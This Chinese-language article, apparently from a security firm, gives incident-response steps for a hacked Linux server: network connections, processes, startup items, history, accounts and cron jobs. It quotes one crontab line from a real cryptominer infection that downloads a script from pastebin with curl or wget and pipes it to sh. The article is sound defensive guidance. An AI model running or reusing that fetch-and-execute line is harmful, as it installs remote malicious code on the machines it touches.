Linux系統(tǒng)被侵入該怎么處理解決

時(shí)間：2020-05-26 14:33:01

關(guān)鍵字： Linux LINUX系統(tǒng) IP PID

手機(jī)看文章

掃描二維碼
隨時(shí)隨地手機(jī)看文章

[導(dǎo)讀] 很多客戶網(wǎng)站服務(wù)器被入侵，被攻擊，找到我們SINE安全公司尋求技術(shù)支持與幫助，有些網(wǎng)站被篡改，被跳轉(zhuǎn)，首頁內(nèi)容被替換，服務(wù)器植入木馬后門，服務(wù)器卡頓，服務(wù)器異常網(wǎng)絡(luò)連接，有的客戶使用的是阿里云服

很多客戶網(wǎng)站服務(wù)器被入侵，被攻擊，找到我們SINE安全公司尋求技術(shù)支持與幫助，有些網(wǎng)站被篡改，被跳轉(zhuǎn)，首頁內(nèi)容被替換，服務(wù)器植入木馬后門，服務(wù)器卡頓，服務(wù)器異常網(wǎng)絡(luò)連接，有的客戶使用的是阿里云服務(wù)器，經(jīng)常被提醒服務(wù)器有挖礦程序，以及網(wǎng)站被上傳webshell的安全提醒，包括騰訊云提示服務(wù)器有木馬文件。

客戶網(wǎng)站被攻擊的第一時(shí)間，是需要立即處理的，降損失降到最低，讓網(wǎng)站恢復(fù)正常的訪問，由于每個(gè)客戶找到我們SINE安全都是比較著急的，安全的處理時(shí)間也需要盡快的處理，根據(jù)我們的處理經(jīng)驗(yàn)，我們總結(jié)了一些服務(wù)器被攻擊，被黑的排查辦法，專門用來檢查服務(wù)器第一時(shí)間的安全問題，看發(fā)生在哪里，服務(wù)器是否被黑，是否被攻擊，那些被篡改等等。

首先我們會(huì)對(duì)當(dāng)前服務(wù)器的IP，以及IP的地址，linux服務(wù)器名稱，服務(wù)器的版本是centos,還是redhat，服務(wù)器的當(dāng)前時(shí)間，進(jìn)行收集并記錄到一個(gè)txt文檔里，接下來再執(zhí)行下一步，對(duì)當(dāng)前服務(wù)器的異常網(wǎng)絡(luò)連接以及異常的系統(tǒng)進(jìn)程檢查，主要是通過netstat -an以及-antp命令來檢查服務(wù)器存在哪些異常的IP連接。并對(duì)連接的IP，進(jìn)行歸屬地查詢，如果是國(guó)外的IP，直接記錄當(dāng)前進(jìn)程的PID值，并自動(dòng)將PID的所有信息記錄，查詢PID所在的linux文件地址，緊接著檢查當(dāng)前占用CPU大于百分之30的進(jìn)程，并檢查該進(jìn)程所在的文件夾。

在我們處理客戶服務(wù)器被攻擊的時(shí)候發(fā)現(xiàn)很多服務(wù)器的命令被篡改，比如正常的PS查看進(jìn)程的，查詢目錄的 cd的命令都給篡改了，讓服務(wù)器無法正常使用命令，檢查服務(wù)器安全造成了困擾。對(duì)服務(wù)器的啟動(dòng)項(xiàng)進(jìn)行檢查，有些服務(wù)器被植入木馬后門，即使重啟服務(wù)器也還是被攻擊，木馬會(huì)自動(dòng)的啟動(dòng)，檢查linux的init.d的文件夾里是否有多余的啟動(dòng)文件，也可以檢查時(shí)間，來判斷啟動(dòng)項(xiàng)是否有問題。

再一個(gè)要檢查的地方是服務(wù)器的歷史命令，history很多服務(wù)器被黑都會(huì)留下痕跡，比如SSH登錄服務(wù)器后，攻擊者對(duì)服務(wù)器進(jìn)行了操作，執(zhí)行了那些惡意命令都可以通過history查詢的到，有沒有使用wget命令下載木馬，或者執(zhí)行SH文件。

檢查服務(wù)器的所有賬號(hào)，以及當(dāng)前使用并登錄的管理員賬戶，tty是本地用戶登錄，pst是遠(yuǎn)程連接的用戶登錄，來排查服務(wù)器是否被黑，被攻擊，也可以檢查login.defs文件的uid值，判斷uid的passwd來獲取最近新建的管理員賬戶。執(zhí)行cat etc/passwd命令檢查是否存在異常的用戶賬戶，包括特權(quán)賬戶，UID值為0.

最重要的是檢查服務(wù)器的定時(shí)任務(wù)，前段時(shí)間某網(wǎng)站客戶中了挖礦病毒，一直占用CPU，查看了定時(shí)任務(wù)發(fā)現(xiàn)每15分鐘自動(dòng)執(zhí)行下載命令，crontab -l */15 * * * * (curl -fsSL pastebin/raw/TS4NeUnd||wget -q-O- pastebin/raw/TS4NeUnd)|sh 代碼如上，自動(dòng)下載并執(zhí)行SH木馬文件。定時(shí)任務(wù)刪都刪不掉，最后通過檢查系統(tǒng)文件查到了木馬，并終止進(jìn)程，強(qiáng)制刪除。有些服務(wù)器被黑后，請(qǐng)立即檢查2天里被修改的文件，可以通過find命令去檢查所有的文件，看是否有木馬后門文件，如果有可以確定服務(wù)器被黑了。

以上就是服務(wù)器被入侵攻擊的檢查辦法，通過我們SINE安全給出的檢查步驟，挨個(gè)去檢查，就會(huì)發(fā)現(xiàn)出問題，最重要的是要檢查日志，對(duì)這些日志要仔細(xì)的檢查，哪怕一個(gè)特征都會(huì)導(dǎo)致服務(wù)器陷入被黑，被攻擊的狀態(tài)，也希望我們的分享能夠幫助到更多需要幫助的人，服務(wù)器安全了，帶來的也是整個(gè)互聯(lián)網(wǎng)的安全。